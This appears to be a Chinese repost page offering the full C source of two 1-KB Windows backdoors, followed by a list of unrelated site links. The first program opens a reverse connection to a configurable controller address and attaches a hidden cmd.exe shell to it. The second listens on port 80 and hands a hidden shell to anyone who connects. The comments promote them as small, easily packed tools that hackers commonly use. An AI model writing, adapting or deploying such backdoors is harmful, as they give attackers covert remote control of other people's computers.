1K后门代码
来源:互联网 发布:网络销售培训学校 编辑:程序博客网 时间:2024/05/04 03:23
/*
1k(程序体积1kb) 反向连接,零管道后门
测试:
本地开启nc -l -p 8000,监听8000端口,会得到一个Shell
*/
#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")
#pragma comment(linker,"/INCREMENTAL:NO /IGNORE:4078")
#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=Anskya /SECTION:Anskya,EWR")
#pragma comment(lib, "ws2_32.lib")//链接到WS2_32.LIB库
#include <winsock2.h>
#include <windows.h>
#define MasterAddr "127.0.0.1" //反弹连接地址或域名
#define MasterPort 8000 //反弹连接端口
void Entrypoint()
{
WSADATA WSADa;
LPHOSTENT HostEnts;
SOCKADDR_IN SockAddrIn;
SOCKET FSocket;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
char szCMDPath[255];
//-----初始化数据------
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
ZeroMemory(&WSADa, sizeof(WSADATA));
//获取cmd路径:
GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
//加载ws2_32.dll
WSAStartup(0x0202,&WSADa);
HostEnts=gethostbyname(MasterAddr);//将域名转换为IP地址
SockAddrIn.sin_family = AF_INET;//表示IPv4地址族
SockAddrIn.sin_addr = *((LPIN_ADDR)*HostEnts->h_addr_list);//IP地址列表
SockAddrIn.sin_port = htons(MasterPort);//端口号
FSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);//创建一个套接字
//获取远程地址和端口与绑定协议
connect(FSocket, (LPSOCKADDR)&SockAddrIn,sizeof(SockAddrIn));
//开始连接远程服务器
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE;//表示隐藏窗口
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
//控制台输入与输出句柄指向已连接套接字FSocket:
StartupInfo.hStdInput = (HANDLE)FSocket;
StartupInfo.hStdOutput = (HANDLE)FSocket;
StartupInfo.hStdError = (HANDLE)FSocket;
//创建匿名管道:
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
//关闭进程句柄
closesocket(FSocket);
WSACleanup();
//关闭连接卸载ws2_32.dll
}
void main(){}
===========
/*
1k(程序体积1kb)正向连接,零管道后门 By DNA32r
说明:
不用我多说了吧..黑客一般都会使用的后门程序..
这里只是简单的演示一下..没有添加进程隐藏功能
程序可以在Win9x,Win2k,WinXP,Win2k3上使用
程序体积只有1k(FSG压缩一下会更小)
测试:
本地开启NetCat等工具,连接远程计算机80端口,会得到一个Shell
*/
#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")
#pragma comment(linker,"/INCREMENTAL:NO /IGNORE:4078")
#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=DNA32r /SECTION:DNA32r,EWR")
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#include <windows.h>
#define MasterPort 80 //连接端口
void Entrypoint()
{
WSADATA WSADa;
sockaddr_in SockAddrIn;
SOCKET CSocket,SSocket;
int iAddrSize;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
char szCMDPath[255];
//-------------------
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
ZeroMemory(&WSADa, sizeof(WSADATA));
//----初始化数据----
//获取cmd路径
GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
//加载ws2_32.dll
WSAStartup(0x0202,&WSADa);
//设置本地信息和绑定协议
SockAddrIn.sin_family = AF_INET;
SockAddrIn.sin_addr.s_addr = INADDR_ANY;
SockAddrIn.sin_port = htons(MasterPort);
CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
//绑定端口
bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));
listen(CSocket,1);
iAddrSize = sizeof(SockAddrIn);
SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
//开始连接远程服务器
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE;
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)SSocket;
StartupInfo.hStdOutput = (HANDLE)SSocket;
StartupInfo.hStdError = (HANDLE)SSocket;
//创建匿名管道
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
//关闭进程句柄
closesocket(CSocket);
closesocket(SSocket);
WSACleanup();
//关闭连接卸载ws2_32.dll
}
- 1K后门代码
- 1K后门代码(精华)
- 反弹式后门代码
- tini2后门代码
- JFolder_JSP后门代码
- 一个1KB的零管道后门【代码】
- 1k(程序体积1kb) 反向连接,零管道后门
- 1k(程序体积1kb) 反向连接,零管道后门(转)
- 插入型ASP后门代码
- 一个单通道后门代码
- 3389之永不查杀的后门shift后门代码
- 后门
- 后门
- 后门
- 远程shell后门C代码(linux)
- 代码简短且隐蔽的后门木马
- 后门BROOTKIT代码学习和原理分析
- 使用php代码加亮函数构造php小后门
- 管道
- java的缺点
- 选择SOA的原因和时机
- 用 Win32 APIs 枚举应用程序窗口和进程和关闭进程
- 回来留个脚印-出个概率题
- 1K后门代码
- 几种坐标系
- 6-4 滚动区域(Scrolling Areas)
- 【原创】消失了N个月,想重出江湖!
- gmail被封以后
- 火车车次前面的各种字母分别代表什么含义?
- PvT心得-如何对付200人口开始进攻的t
- SOA 关键问题解答
- 在ajax 时代,收集js